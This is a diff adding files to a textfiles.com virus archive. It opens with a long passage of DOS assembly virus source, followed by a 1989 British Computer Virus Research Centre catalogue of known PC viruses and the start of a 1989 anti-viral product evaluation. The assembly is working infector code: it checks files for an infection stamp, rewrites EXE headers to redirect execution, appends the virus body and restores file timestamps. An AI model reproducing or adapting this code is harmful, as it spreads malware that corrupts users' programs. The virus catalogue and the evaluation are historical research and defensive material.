lodsb + stosb + or al,al + jnz move_fnm + + push dx + push bx + mov dx,offset buffer.new_area + sub dx,adjust + add dx,bx + mov ax,3d02h ;Open file with handle + ;for read/write + int 21h + pop bx + pop dx + jnc go_ahead ;In case file cannot be opened + jmp error_exit + +go_ahead: + mov si,offset buffer.handle + sub si,adjust + add si,bx + mov [si],ax ;Save handle + + push bx + mov bx,ax ;Prepare for lseek + push dx + mov cx,0000h ;Look at the end of the file + mov dx,0000h ;Offset of -12 from the end + ;of the file + mov ax,4202h ;Lseek function call + int 21h + mov cx,dx + pop dx + pop bx + jnc compute_length + jmp close_error + +compute_length: + + sub ax,000ch + sbb cx,0000h ;Exact position + + +save_offset: ; + mov si,offset buffer.pointer5 + sub si,adjust + add si,bx + mov [si],ax + add si,2 + mov [si],cx + + push bx + push dx + mov si,offset buffer.handle + sub si,adjust + add si,bx + mov bx,[si] + mov dx,ax + mov ax,4200h ;From beginning of file + int 21h ;Lseek function call + pop dx + pop bx + jnc set_buffer + jmp close_error + +set_buffer: + push bx + push dx + mov dx,offset buffer.new_data + sub dx,adjust + add dx,bx + mov si,offset buffer.handle + sub si,adjust + add si,bx + mov bx,[si] ;Load handle + mov cx,000ch + mov ax,3f00h + int 21h ;Read function call + pop dx + pop bx + jnc read_ok + jmp close_error + +read_ok: + mov si,offset buffer.virus_stamp + mov di,offset buffer.new_data + sub si,adjust + sub di,adjust + add si,bx + add di,bx + mov cx,12 ;Length of strings to + ;compare + repe cmpsb + pushf + mov si,offset buffer.infected + sub si,adjust + add si,bx + mov word ptr [si],0000h + popf + jnz infect_it + +close_error: + mov si,offset buffer.handle + sub si,adjust + add si,bx + push bx + mov bx,[si] + mov ax,3e00h ;Close file function call + int 21h + pop bx + jmp error_exit + +infect_it: + mov si,offset buffer.infected + sub si,adjust + add si,bx + mov word ptr [si],7777h + + mov si,offset buffer.where_from_flag + sub si,adjust + add si,bx + mov ax,[si] + sub si,2 + mov [si],ax ;This code effectively moves + ;where_from_flag into help_flag + + add si,2 + mov [si],5a5ah ;Ready to infect + push bx + push dx + mov si,offset buffer.handle + sub si,adjust + add si,bx + mov bx,[si] + xor cx,cx + xor dx,dx + mov ax,4200h ;From beginning of file + int 21h ;Lseek function call + pop dx + pop bx + jnc set_new_data + jmp append_ok + +set_new_data: + push bx + push dx + mov dx,offset buffer.new_data + sub dx,adjust + add dx,bx + mov si,offset buffer.handle + sub si,adjust + add si,bx + mov bx,[si] ;Load handle + mov cx,001bh ;Read formatted exe header + mov ax,3f00h + int 21h ;Read function call + pop dx + pop bx + jnc read_header + jmp append_ok + +read_header: + nop ;some code to modify header + ; + + mov si,offset buffer.pointer5 + sub si,adjust + add si,bx + mov ax,[si] + add si,2 + add ax,0ch + adc word ptr [si],0000h + sub si,2 + mov [si],ax ;This code restores original + ;filelength + + mov si,offset buffer.new_data + sub si,adjust + add si,bx + mov ax,[si] + cmp ax,5a4dh ;check for valid exe file + jz valid_exe + jmp append_ok + +valid_exe: + mov ax,[si+8] ;Load module size + xor dx,dx + shl ax,1 + rcl dx,1 + shl ax,1 + rcl dx,1 + shl ax,1 + rcl dx,1 + shl ax,1 + rcl dx,1 ;Multiply by 16 + + push ax + push dx ;Adjust new size + push cx + mov dx,virussize-896+64 + push dx + mov cx,0009h + shr dx,cl + add word ptr [si+4],dx + pop dx + and dx,01ffh + add dx,word ptr [si+2] + cmp dx,512 + jl adjust_okay + sub dx,512 + inc word ptr [si+4] +adjust_okay: + mov word ptr [si+2],dx + pop cx + pop dx + pop ax + + + push si ;This SI is very useful so save it + + mov si,offset buffer.pointer5 + sub si,adjust + add si,bx + sub [si],ax + mov ax,[si] + sbb [si+2],dx + mov dx,[si+2] ;the byte size of the load module + + + pop si + push ax + push dx + mov ax,[si+14h] + mov dx,[si+16h] ;Get CS:IP value + mov cx,[si+0eh] ;Get SS value + push si + mov si,offset buffer.IP_save + sub si,adjust + add si,bx + xchg [si],ax + xchg [si+2],dx + mov si,offset buffer.SS_save + sub si,adjust + add si,bx + xchg [si],cx + mov si,offset buffer.ip_old + sub si,adjust + add si,bx + mov [si],ax + mov [si+2],dx + mov si,offset buffer.ss_old + sub si,adjust + add si,bx + mov [si],cx + pop si + pop dx + pop ax + + push ax + push dx + + shl ax,1 + rcl dx,1 + shl ax,1 + rcl dx,1 + shl ax,1 + rcl dx,1 + shl ax,1 + rcl dx,1 ;Multiply by 16 + + mov cx,0008h + shl dx,cl + mov cx,0004h + shr ax,cl ;A very obscure algorithm to make + ;a segment:offset pair + mov [si+14h],ax + mov [si+16h],dx ;Infected values + + push si + mov si,offset buffer.far_push + sub si,adjust + add si,bx + xchg [si],dx + mov word ptr [si+2],dx + pop si + + pop dx + pop ax + add ax,virussize ; + adc dx,0000h + + mov cx,0003h +mul_loop: + + shl ax,1 + rcl dx,1 + shl ax,1 + rcl dx,1 + shl ax,1 + rcl dx,1 + shl ax,1 + rcl dx,1 ;Multiply by 4096 + loop mul_loop + + or ax,ax + jz exact_value + inc dx +exact_value: + mov [si+0eh],dx ;Infected stack segment + + ;Write back infected header + push si + push bx + mov si,offset buffer.handle + sub si,adjust + add si,bx + mov bx,[si] + mov ax,5700h ;Get time function + int 21h + pop bx + pop si + jnc correct_time + jmp append_ok1 + +correct_time: + push cx + push bx + push dx + mov si,offset buffer.handle + sub si,adjust + add si,bx + mov bx,[si] + xor cx,cx + xor dx,dx + mov ax,4200h ;From beginning of file + int 21h ;Lseek function call + pop dx + pop bx + pop cx + jnc continue_infection + jmp append_ok1 + +continue_infection: + + push cx + push dx + push bx + mov dx,offset buffer.new_data + sub dx,adjust + add dx,bx + mov si,offset buffer.handle + sub si,adjust + add si,bx + mov bx,[si] ;Load handle + mov cx,001bh ;Write infected exe header + mov ax,4000h + int 21h ;Write function call + pop bx + pop dx + pop cx + jnc glue_virus + jmp append_ok1 + +glue_virus: + + push cx + push bx + push dx + mov si,offset buffer.handle + sub si,adjust + add si,bx + mov bx,[si] + xor cx,cx + xor dx,dx + mov ax,4202h ;From the end of file + int 21h ;Lseek function call + pop dx + pop bx + pop cx + jnc write_data + jmp append_ok1 + +write_data: + + mov si,offset buffer.handle + sub si,adjust + add si,bx + + push dx + push cx + + mov dx,bx + sub dx,3 ;The starting three byte + ;call instruction + push es + push bx + push dx + push si + mov ax,2f00h + int 21h + pop si + pop dx + + push es + push bx + + push si + mov ax,1a00h + int 21h + pop si + + + mov bx,[si] ;Load handle + mov cx,virussize-896+64 ;Length of virus obtained + mov ax,4000h ;with dir + int 21h + lahf ;Write function call + + pop bx + pop es + + push ds + push es + pop ds + mov dx,bx + push ax + mov ax,1a00h + int 21h + pop ax + + pop ds + pop bx + pop es + + pop cx + pop dx + + sahf + jnc put_stamp ;Error or not file + jmp append_ok1 ;is closed + +put_stamp: + push bx + mov si,offset buffer.handle + sub si,adjust + add si,bx + mov bx,[si] + mov ax,5701h ;Set time function + int 21h + pop bx + +append_ok1: + + mov si,offset buffer.ip_old ;Restore previous CS:IP values + sub si,adjust + add si,bx + mov ax,[si] + mov dx,[si+2] + mov si,offset buffer.IP_save + sub si,adjust + add si,bx + mov [si],ax + mov [si+2],dx + + mov si,offset buffer.save_push + sub si,adjust + add si,bx + mov ax,[si] + mov word ptr [si-2],ax + + mov si,offset buffer.ss_old + sub si,adjust + add si,bx + mov ax,[si] + mov si,offset buffer.SS_save + sub si,adjust + add si,bx + mov word ptr [si],ax + + +append_ok: + mov si,offset buffer.help_flag + sub si,adjust + add si,bx + mov ax,[si] + add si,2 + mov [si],ax ;This code effectively moves + ;help_flag into where_from_flag + + + jmp close_error ; + +error_exit: + mov si,offset buffer.pointer3 + sub si,adjust + add si,bx + mov dx,[si] ;Restore original DTA + add si,2 + mov ax,[si] + push ds + mov ds,ax + mov ax,1a00h ;Set DTA function call + int 21h + pop ds + pop di + pop si + pop dx + pop cx + pop bx + pop ax + ret + +try_to_infect ENDP + +transfer_filespec PROC + + push si + mov si,offset buffer.filematch ;Transfer name to the working + ;area + sub si,adjust + add si,bx + call byte_move + pop si + ret + +transfer_filespec ENDP + +search_all PROC + + push si + mov si,offset buffer.matchall ;This is the '*.*' filename + sub si,adjust + add si,bx + call byte_move + pop si + ret + +search_all ENDP + +byte_move PROC + + push ax + push di + + cld + +move_loop: + lodsb + stosb + or al,al ;The string to move is ASCIIZ + jne move_loop + pop di + pop ax + ret + +byte_move ENDP + +find_first PROC + + push cx + push bx + cmp dx,0000h + jnbe over_set + mov dx,offset buffer.buffer2 ;Set Data Transfer Area + sub dx,adjust ;or Disk Transfer area + add dx,bx ; +over_set: + add dx,02Bh + mov cx,00010h ;Attribute byte for + ;directory search + mov ah,01ah + int 021h ;Set DTA function call + + pop bx + push bx + push dx + mov dx,offset buffer.buffer1 + sub dx,adjust + add dx,bx + mov ah,04eh ;find first + ;function call + int 021h + pop dx + pop bx + pop cx + ret + +find_first ENDP + +find_next PROC + + push cx + push bx + push dx + mov dx,offset buffer.buffer1 + sub dx,adjust + add dx,bx + mov cx,00010h + mov ah,04fh ;Find next function call + int 021h + pop dx + pop bx + pop cx + ret + +find_next ENDP + +delay PROC + + push ax + push bx + push cx + push dx + mov ah,2ch ;Read current time + int 21h + + mov ah,ch + add al,cl + add bh,dh + add bl,dl + + cmp bl,100 + jb secs + sub bl,100 + inc bh +secs: cmp bh,60 + jb mins + sub bh,60 + inc al +mins: cmp al,60 + jb hours + sub al,60 + inc ah +hours: cmp ah,24 + jne tcheck + sub ah,ah + +tcheck: push ax + mov ah,2ch + int 21h + + pop ax + cmp cx,ax + ja tdquit + jb tcheck + cmp dx,bx + jb tcheck + +tdquit: pop dx + pop cx + pop bx + pop ax + ret + +delay ENDP + +sound PROC + + push ax + push cx + push dx + push di + + mov al,0b6h + out 43h,al + mov dx,14h + mov ax,533h*896 + div di + out 42h,al + mov al,ah + out 42h,al + in al,61h + mov ah,al + or al,3 + out 61h,al + mov al,cl + call delay + mov al,ah + out 61h,al + pop di + pop dx + pop cx + pop ax + ret + +sound ENDP + +music_play PROC + + push bx + push cx + push di + push si + push bp + +freq: + + mov di,[si] + cmp di,0ffffh + je end_play + mov bl,ds:[bp] + sub cl,cl + sub bh,bh + call sound + add si,2 + inc bp + jnz freq + +end_play: + pop bp + pop si + pop di + pop cx + pop bx + ret + +music_play ENDP + +mary_proc PROC + + push bx + push bp + + mov si,offset mary_freq + mov bp,offset mary_time + sub si,adjust + sub bp,adjust + add si,bx + add bp,bx + call music_play + + pop bp + pop bx + ret + +mary_proc ENDP + +mary_freq dw 262,262,293,329,262,329,293,196 + dw 262,262,293,329,262,262 + dw 262,262,293,329,349,329,293,262 + dw 246,196,220,246,262,262 + dw 220,246,220,174,220,246,262,220 + dw 196,220,196,174,164,174,196 + dw 220,246,220,174,220,246,262,220 + dw 196,262,246,293,262,262,0ffffh + + +mary_time db 8 dup(25) + db 4 dup(25), 50, 50 + db 8 dup(25) + db 4 dup(25), 50, 50 + db 26, 25, 26, 5 dup(25) + db 26, 25, 26, 3 dup(25), 30 + db 26, 25, 26, 4 dup(25), 30 + db 4 dup(25), 50, 50 + + + +setup_data: + cli + pop bx ;This will catch instruction pointer + push bx + sti ;value and after that restore stack + ret ;pointer value + + +buffer data_area <> ;Reseve data_area space + + + END start \ No newline at end of file diff --git a/textfiles.com/virus/european.txt b/textfiles.com/virus/european.txt new file mode 100644 index 00000000..e6733972 --- /dev/null +++ b/textfiles.com/virus/european.txt @@ -0,0 +1,369 @@ + +Please find enclosed a list of known viruses in the UK prepared by +Joe Hirst of the BCVRC, he is happy that it be distributed as widely +as possible. + +Of great interest is the new Fu Manchu variant of the Israeli virus, +a virus with a slightly embarassing manipulation task! + +Ps. Joe doesn't have a mail box to date but I will relay any requests, +comments or information you pass on. + +D.Ferbrache +European co-ordinator +Comp.Virus + + IMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM; + : Joe Hirst British Computer Virus Research Centre : + : 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England : + : Telephone: Domestic 0273-26105, International +44-273-26105 : + : : + : List of known PC viruses : + : : + : This list is intended to give enough information to identify a virus : + : or a variant form of a virus. It is not intended by itself to supply : + : enough information for a programmer to deal with a virus. If any virus : + : is found which does not exactly match any of the following descriptions : + : the Centre requests that a copy of the virus be sent to us, or to a : + : local researcher known to be in contact with us. : + HMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM< + + 1. 405 + Parasitic virus - overwriting + +Type description: + Virus occurs overwriting the first 405 bytes of a COM file. The virus + will attempt to infect one COM file on a different disk to the current + one. If the length of the file to be infected is less than 405 bytes, + the length will be increased to 405. Due to mistakes in the code it is + not able to infect other than in the current directory, nor is it able + to recognise an infected file. + + ----------- + + 2. Brain + Boot virus - floppy only + +Type description: + This virus consists of a boot sector and three clusters (6 sectors) + marked as bad in the FAT. The first of these sectors contains the + original boot sector, and the rest contain the rest of the virus. It + only infects 360K floppies, and it occupies 7K of memory. It creates a + label on an infected disk of ' (c) Brain '. There are a number of + unused character strings which can be used to identify it: + + Offset 0010H: + ' Welcome to the Dungeon ' + ' (c) 1986 Basit & Amjad (pvt) Lt' + 'd. BRAIN COMPUTER SERVICES..730 NI' + 'ZAM BLOCK ALLAMA IQBAL TOWN LAHOR' + 'E-PAKISTAN..PHONE :430791,443248,280530. ' + ' Beware of this VIRUS.....Contact us for vaccin' + 'ation............... $#@%$@!! ' + Offset 0202H + '(c) 1986 Basit & Amjads (pvt) Ltd ' + Offset 0355H + ' (c) 1986 Basit & Amjads (pvt) Ltd' + Offset 04A6H + ' (c) Brain $' + +Variations: + All the variations we have so far seen have only involved changes to + these character strings. + + (1) Offset 0010H: + 'Welcome to the Dungeon (c) 1986 D.C.L', 17H, '&' + ' Amjads (pvt) Ltd VIRUS_SHOE RECORD v9.0 ' + 'Dedicated to the dynamic memories of millions of' + ' virus who are no longer with us today - Thanks ' + 'GOODNESS!! BEWARE OF THE er..VIRUS : \thi' + 's program is catching program follows after' + ' these messeges..... $#@%$@!! ' + Offset 0202H + '(c) 1986 Brain & Amjads (pvt) Ltd ' + Offset 0355H + ' (c) 1986 Brain & Amjads (pvt) Ltd' + Offset 04A6H + ' (c) ashar $' + (2) As variation 1 except 'D.C.L' is changed to 'Brain' in string at offset + 0010H + (3) As variation 2 except 'Brain' is changed to 'Jork ' in string at offset + 0202H + + ----------- + + 3. Cascade - AKA 1701, 1704 + Parasitic virus - resident + +Type description: + The virus occurs attached to the end of a COM file. COM files increase + in length by 1701 bytes. The first three bytes of the program are + stored in the virus, and replaced by a branch to the beginning of the + virus. The virus is encrypted (apart from the first 35 bytes) using an + algorithm that includes the length of the host program, so every sample + looks different. It becomes memory-resident when the first infected + program is run, and it will then infect every COM file run (even if the + file has an EXE extension). If the system date is between October and + December 1988 the cascade display will be activated at random + intervals. The virus tests the BIOS for the string 'COPR. IBM', and + will not infect if it finds this - however there are errors in the code + which prevent it from working. Because recognition depends on the + length of the virus, it will infect programs already infected by + variants with different lengths. + +Variations: + (1) COM files increase in length by 1704 bytes. The only differences are + the removal of a conditional jump (which would never have been taken), + and some necessary segment overrides on the BIOS tests missing in the + previous version. There is still a mistake preventing an IBM machine + from being recognised. + + ----------- + + 4. Datacrime - AKA 1168 + Parasitic virus - non-resident + +Type description: + The virus occurs attached to the end of a COM file. COM files increase + in length by 1168 bytes. The first three bytes of the program are + stored in the virus, and replaced by a branch to the beginning of the + virus. The virus will search through full directory structure of the + disks (in the order C, D, A, B) for a COM file other than COMMAND.COM. + It will also ignore any COM file if the 7th letter of the name is a D. + If the date is after 12 October (any year) it will display the message: + 'DATACRIME VIRUS' + 'RELEASED: 1 MARCH 1989' + and do a low level format on track zero, all heads, of the hard disk. + Due to mistakes in the code the system is almost certain to crash the + first time the critical error handler is invoked after the virus + terminates. + + ----------- + + 5. Dbase [report only - no sample] + Parasitic virus - resident + +Type description: + Infects COM and EXE files. Transposes random bytes of any open .DBF + file, keeping a record of which bytes in a hidden file (BUG.DAT) in the + same directory. The virus restores these bytes if the file is read. + If the BUG.DAT file is 90 days old or more the FAT and root directory + are overwritten. + + ----------- + + 6. Den Zuk - AKA Search [report only - no sample] + Boot virus - floppy only + +Type description: + Graphics display of 'DEN ZUK', together with the AT&T logo, slides in + from the sides of the screen on bootup. After five such bootups the + disk is trashed - no details of how. + + ----------- + + 7. Fu Manchu + Parasitic virus - resident + +Type description: + The virus occurs attached to the beginning of a COM file, or the end of + an EXE file. It is a rewritten version of the Jerusalem virus, and + most of what is said for that virus applies here with the following + changes: + + a. The code to delete programs, slow down the machine, and display + the black 'window' has been removed, as has the dead area at + the end of the virus and some sections of unused code. + b. The marker is now 'rEMHOr' (six bytes), and the preceeding 'sU' + is now 'sAX' (Sax Rohmer - creator of Fu Manchu). + c. COM files now increase in length by 2086 bytes & EXE files 2080 + bytes. EXE files are now only infected once. + d. One in sixteen times on infection a timer is installed which + runs for a random number of half-hours (maximum 7.5 hours). At + the end of this time the message 'The world will hear from me + again!' is displayed in the centre of the screen and the + machine reboots. This message is also displayed every time + Ctrl-Alt-Del is pressed on an infected machine, but the virus + does not survive the reboot. + e. There is further code which activates on or after the first of + August 1989. This monitors the keyboard buffer, and makes + derogatory additions to the names of politicians (Thatcher, + Reagan, Botha & Waldheim), censors out two four-letter words, + and to 'Fu Manchu ' adds 'virus 3/10/88 - latest in the new fun + line!' All these additions go into the keyboard buffer, so + their effect is not restricted to the VDU. All messages are + encryted. + + ----------- + + 8. Italian - AKA Pingpong + Boot virus - DOS boot sector + +Type description: + This virus consists of a boot sector and 1 cluster (2 sectors used) + marked as bad in the first copy of the FAT. The first of these sectors + contains the rest of the virus, and the second contains the original + boot sector. It infects all disks which have at least two sectors per + cluster, and it occupies 2K of memory. It displays a single character + 'bouncing ball' which interacts with some characters on the screen. It + will not run on an 80286 or an 80386 machine. + + ----------- + + 9. Jerusalem - AKA 1813, Friday the 13th, PLO, Israeli + Parasitic virus - resident + +Type description: + The virus occurs attached to the beginning of a COM file, or the end of + an EXE file. A COM file also has the five-byte 'marker' attached to + the end. This marker is usually (but not always) 'MsDos', and is + preceeded in the virus by 'sU'. COM files increase in length by 1813 + bytes. EXE files usually increase by 1808 bytes, but the displacement + at which to write the virus is taken from the length in the EXE header + and not the actual length. This means that part or all of this 1808 + bytes may be overwritten on the end of the host program. It becomes + memory-resident when the first infected program is run, and it will + then infect every program run except COMMAND.COM. COM files are + infected once only, EXE files are re-infected each time they are run. + After the system has been infected for thirty minutes an area of the + screen from row 5 column 5 to row 16 column 16 is scrolled up two lines + creating a black two line 'window'. From this point a time-wasting + loop is executed with each timer interrupt. If the system was infected + with a system date of Friday the thirteenth, every program run will be + deleted instead. This will continue irrespective of the system date + until the machine is rebooted. The end of the virus, from offset + 0600H, is rubbish and will vary from sample to sample. + +Variations: + (1) [report only - no sample] + This is almost certainly an earlier variant. The string 'sUMsDos' in + the type version is 'sURIV 3.00' in this version, the 30 minute delay + is here 30 seconds, and there is a bug in the program delete. + + (2) [report only - no sample] + This is probably the first version. Only COM files are infected, and + the target date is 1st April. When target date is reached, the trojan + element is triggered the first time an uninfected file is infected by + the memory-resident virus. This produces the message 'APRIL 1ST HA HA + HA YOU HAVE A VIRUS', and the machine locks. Identifying string is + 'sURIV 1.01'. + + (3) [report only - no sample] + As variation 2, but only infects EXE files. Trojan is triggered first + time an infected file is run on 1st April. Additionally, machine locks + one hour after infection if default date of 1-1-80 is used. Virus + infects file only once. Identifying string is 'sURIV 2.01'. + + ----------- + + 10. Lehigh [report only - no sample] + Parasitic virus - overwriting + +Type description: + Infects only COMMAND.COM, where it overwrites the stack space. If a + disk which contains an uninfected copy of COMMAND.COM is accessed, that + copy is also infected. A count of infections is kept within each copy + of the virus, and when this count reaches 4 every disk (including hard + disks) currently in the computer is trashed by overwriting the initial + tracks (boot sector & FAT). Infection changes the date and time of the + infected file. If a floppy with an uninfected COMMAND.COM is write- + protected, there will be a 'WRITE PROTECT ERROR' message from DOS. + + ----------- + + 11. New Zealand - AKA Stoned, Marijuana + Boot virus - master boot sector + +Type description: + This virus consists of a boot sector only. It infects all disks, and + it occupies 1K of memory. The original boot sector is held in track + zero, head one, sector three on a floppy disk, and track zero head + zero, sector two on a hard disk. The boot sector contains two + character strings: 'Your PC is now Stoned!' & 'LEGALISE MARIJUANA!'. + The first of these is only displayed one in eight times when booting + from an infected floppy, the second is unreferenced. + +Variations: + (1) Much of the code has been reorganised. The only significant change is + that the original boot sector is stored at track zero, head zero, + sector seven on a hard disk. The second string is not transfered when + infecting a hard disk. + + ----------- + + 12. Oropax - AKA Music virus [report only - no sample] + Parasitic virus - resident + +Type description: + Infects COM files, length increases by 2756-2806 bytes, so that total + length is divisible by 51. Becomes active (randomly) five minutes + after infection, playing three different tunes with a seven minute + interval. + + ----------- + + 13. Pentagon + Boot virus - floppy only + +Type description: + Virus is possibly an honorary term, at least for this sample, as all + attempts to run it have so far failed. The following describes what + would happen if it did work (as future samples might). + This virus consists of a boot sector and two files. The boot sector is + a normal PCDOS 3.20 boot sector with three changes: + 1. The OEM name 'IBM' has been changed to 'HAL'. + 2. The first part of the virus code overwrites 036H to 0C5H. + 3. 100H-122H has been overwritten by a character string. + The name of the first file is the hex character 0F9H. This file + contains the rest of the virus code followed by the original boot + sector. The name of the second file is PENTAGON.TXT. This file does + not appear to be used in any way or contain any meaningful data. Both + files are created without the aid of DOS, and the first file is + accessed by its stored absolute location. Four different sections of + the virus are separately encrypted: + 1. 004AH - 004BH, key 0ABCDH - load decryption key + 2. 0059H - 00C4H, key 0FCH - rest of virus code in boot sector. + 3. 0791H - 07DFH, key 0AAH - the file name and copyright message. + 4. 0800H - 09FFH, key 0FCH - the original boot sector. + The virus will survive a warm boot (Ctrl-Alt-Del). It only infects + 360K floppies, and it will look for and remove Brain from any disk that + it infects. It occupies 5K in memory. + + ----------- + + 14. Vienna - AKA 648, Austrian, Unesco + Parasitic virus - non-resident + +Type description: + The virus occurs attached to the end of a COM file. COM files increase + in length by 648 bytes. The first three bytes of the program are + stored in the virus, and replaced by a branch to the beginning of the + virus. The virus looks for, and infects, one COM file - either in the + current directory or in one of the directories on the PATH. One in + eight files 'infected' does not get a copy of the virus. Instead the + first five bytes of the program are replaced by a far jump to the BIOS + initialization routine. + +Variations: + (1) This is the version published in Ralf Burger's book 'Computer Viruses: + A High-Tech Disease'. An error has been introduced which disables the + virus's ability to search through the PATH, and the far jump has been + replaced by five spaces. + + ----------- + + 15. Yale - AKA Alameda, Merritt + Boot virus - floppy only + +Type description: + This virus consists of a boot sector only. It infects floppies in the + A-drive only and it occupies 1K of memory. The original boot sector is + held in track thirty-nine, head zero, sector eight. It hooks into INT + 9, and only infects when Ctrl-Alt-Del is pressed. It will not run on + an 80286 or an 80386 machine, although it will infect on such a + machine. It has been assembled using A86. It contains code to format + track thirty-nine, head zero, but this has been disabled. + + ----------- + + \ No newline at end of file diff --git a/textfiles.com/virus/eval.vir b/textfiles.com/virus/eval.vir new file mode 100644 index 00000000..fd4c1673 --- /dev/null +++ b/textfiles.com/virus/eval.vir @@ -0,0 +1,499 @@ + + Anti-Viral Product Evaluation + May 5, 1989 + + This evaluation paper has been written by Jim Goodwin, Lynn +Marsh and Tim Sankary. It is copyrighted, 1989, and is intended +for circulation among fellow members of the virus research +community who use IBM PCs or compatibles. We do not consider it +complete, since we did not evaluate every available product, and +it is not intended as a public guide to selecting antiviral +programs. We hope, however, that it will prove useful to other +members of the community who work with live viruses and need +ongoing protection for their systems. This document may be +freely copied and distributed providing the disclaimer and +copyright are kept intact, and no changes, additions or deletions +are made to the text. + We would like to acknowledge the ample research data +provided by Jim Bates and Rusty Davis in England, Ivan Grebert of +Acal Corporation in Paris, Colin Haynes of the International +Computer Virus Institute, and the many volunteer researchers from +the Silicon Valley area that contributed so much to our efforts. +We would also like to acknowledge the HomeBase users group for +providing their detailed log of infection occurrences and other +epidemiological data. + + +The Need for a Reasonable Evaluation: + In the April issue of PC Magazine you will find a review of +11 antiviral products. The review, while well intentioned, +tested products against only two viruses (plus one simulated +virus that was developed by the magazine). None of the viruses +were boot sector infectors (viruses which attach to the boot +sector) and none were among the most common viruses. Since the +vast majority of virus infections are boot sector infections, and +since most viruses are much more difficult to detect than the two +chosen, the results of the review were next to meaningless. The +PC Magazine review was similar to many others published in the +past year. It was performed without adequate access to the +viruses actually causing problems in the user community. + A second problem with these reviews, is that many of the +reviewers have had limited experience with the broad range of +infections that have occurred within the past 18 months. They +base evaluations on assumptions that do not hold for the real +world. This is not necessarily the fault of the reviewers. +Viruses are a new phenomenon and few people have dedicated their +time and resources to a long term study. A reviewer who has had +experience with only one or two viruses might naturally draw +incorrect conclusions about "generic" virus issues. + For example, a number of viruses infect programs using +common DOS calls (interrupt 21 or other interrupt call). This +type of infection can be easily detected and prevented. An +entire class of products, called Filters, has grown up around the +assumption that virus infections can be prevented by redirecting +certain interrupts and intercepting the infection replication +process. It works for a few viruses. The vast majority of +infections, though, are caused by viruses that use non-standard +I/O, and these infections cannot be prevented through interrupt +re-vectoring techniques. Thus, filter type products - included +among them are C-4 and Flu-Shot+ - are virtually useless against +most viruses. Yet many reviewers, and some product developers, +still believe that viruses can be stopped through re-directing +system interrupts. + +The criteria: + A lot of time and effort has gone into the various checksum, +encryption, logging and chaining algorithms proposed as safe +techniques for detecting viruses. And much discussion and +argumentation has gone one regarding the various merits of high +security algorithms. Yet, every generic application infector +that we have seen to date could have been detected by merely +checking to see if the SIZE of the file had changed. Developing +such a virus detector requires less than an hour of programming +time and is as effective as available products costing hundreds +of dollars. We're not suggesting that size checking should be +the criteria for detecting viruses (we know better), we are +merely pointing out the vast gulf between theory and current +reality. We understand that viruses of today may not reflect the +situation two years from now, and we also understand that current +boot sector viruses and certain operating system viruses pose a +special case to our size example, but the first step in solving +any problem must be a solid understanding of the current state of +the problem. And the current problem is in a different world +from the theoretical solutions proposed for it. + An astute reader might ask at this point why we would be +concerned if the proposed solutions to viruses were overkill. +Isn't it better, you might think, to include as much protection +as is available, to get as close to 100% security as possible? +We think not. Beta testing of virus products in many +corporations and our own experience with these products over the +past year has shown that, beyond a certain point of +reasonableness, increased security functions begin to hinder the +computing process. Either increases in required run time, or +user constraints or annoying additions to the system make the +products so cumbersome to use that the user ultimately discards +them. Alternately, false alarms and questionable product +conditions desensitize the user, and thus real virus alarms, when +they occur, are disregarded. + Again, we are not saying that sound security principles +should not be included in a given product. We are only +suggesting that the search for the 100% solution must have its +limits. The theoretical discussions about batch file viruses, +viruses that can imbed themselves within a program without +changing initial branch addresses, and viruses that can infect +without making any modifications to a program are interesting and +entertaining. But if you are selecting a product based on the +ability to detect such viruses, then you will be disappointed. + In general then, our criteria for evaluating antiviral +programs are: + + 1. The program's effectiveness against existing viruses. + There are anywhere from two dozen to over 50 different + PC viruses (depending on how you classify them) that + can infect your system today. If the product cannot + detect these viruses, then it certainly cannot detect + tomorrow's viruses. We rated this criteria the + highest. + + 2. The techniques used by the program to anticipate new + viruses. We have to admit to some subjectivity here. + No-one really knows what virus may pop up tomorrow, but + reasonable people can make reasonable guesses (Tim + Sankary is the only member of this review team who + admits to being unreasonable). We do expect to see + viruses in the next few years that can imbed themselves + inside a generic COM or EXE program without changing + its size. We anticipate system infectors and other + program-specific viruses that can imbed themselves AND + not change initial branch instructions. (We feel these + viruses, however, will be limited to common programs + such as IBMBIO, IBMSYS, COMMAND.COM etc.). We + anticipate viruses that will encrypt themselves in such + a way that every infection will be different (1704 + nearly achieves that now). We anticipate boot sector + viruses that will not need to save and execute the + original boot sector. We also expect viruses that will + entirely replace system modules, such as the command + interpreter. + + 3. The usability of the software. This is the most + subjective criteria and we accordingly weighted it the + least. We decided, however, that if we felt like + screaming, smashing the monitor or savagely beating the + family pets while trying to install or use the program, + then we would subtract points for lack of user + friendliness. + +The Viruses: + Jim Goodwin insisted that there were 61 PC viruses and that +we should test them all. He includes in this list three versions +of the Pakistani Brain that differ only in the imbedded text and +volume label copyright display, and four identical versions of +the 1704 that differ only in their activation dates. Lynn +Marsh, who has a new beau, and, we suspected, would like to +spend time with him, suggested that there were only 14 base PC +viruses. Any modifications to these viruses, she insisted, were +inconsequential and should be ignored. A compromise was reached +along the following lines: + + Any modification to a base virus that materially + altered its ability to be detected would be considered + a different virus for our testing purpose. + + Frankly, the definition didn't help us much because we +continued to squabble, but it eventually worked itself out. It +became clear that certain modifications to base viruses did +indeed materially affect our test results. As an example, one +modification to the Israeli virus, called the New Jerusalem, +performs a format of the hard disk when it activates, and it +additionally does not have the EXE infector bug that the +original Israeli had. When this virus activated, one antiviral +products that was able to detect the original Israeli file-delete +activation and prevent it, was unable to detect the modified +virus's format attempt. There were numerous other such +examples. Even machine or configuration type changes (such as +the numerous 1704 modifications) had an effect on testing under +certain circumstances. We finally narrowed the field down to 27 +distinct viruses, 11 of which were boot sector infectors. + We realize that our test base is skewed if you compare it +to infection reporting statistics (where over 80% of infections +are boot sector infections), but we feel the sampling will become +more valid over time, since the boot infector ratio appears to be +slowly declining. + +The Testing: + All testing was performed on systems with fixed disks. +Where applicable, the infection was introduced onto the hard +disk. The only exceptions to this were five boot sector viruses +which would not replicate onto a fixed disk. When testing +against these floppy-only viruses, a 5 and 1/4 inch, 360KB +diskette was used. The test systems each contained over 300 +executable programs, approximately 2/3 EXE programs and 1/3 COM +programs, arranged in multiple levels of directories. Programs +with overlay structures were also included. DOS 2.0 and 3.3 were +both used, and testing was performed with and without the memory +resident program and shell routine - Carousel and Norton +Commander. Monochrome and VGA graphics adaptors were also +included. + All product detection tests were made while boot sector +viruses were already in memory and in 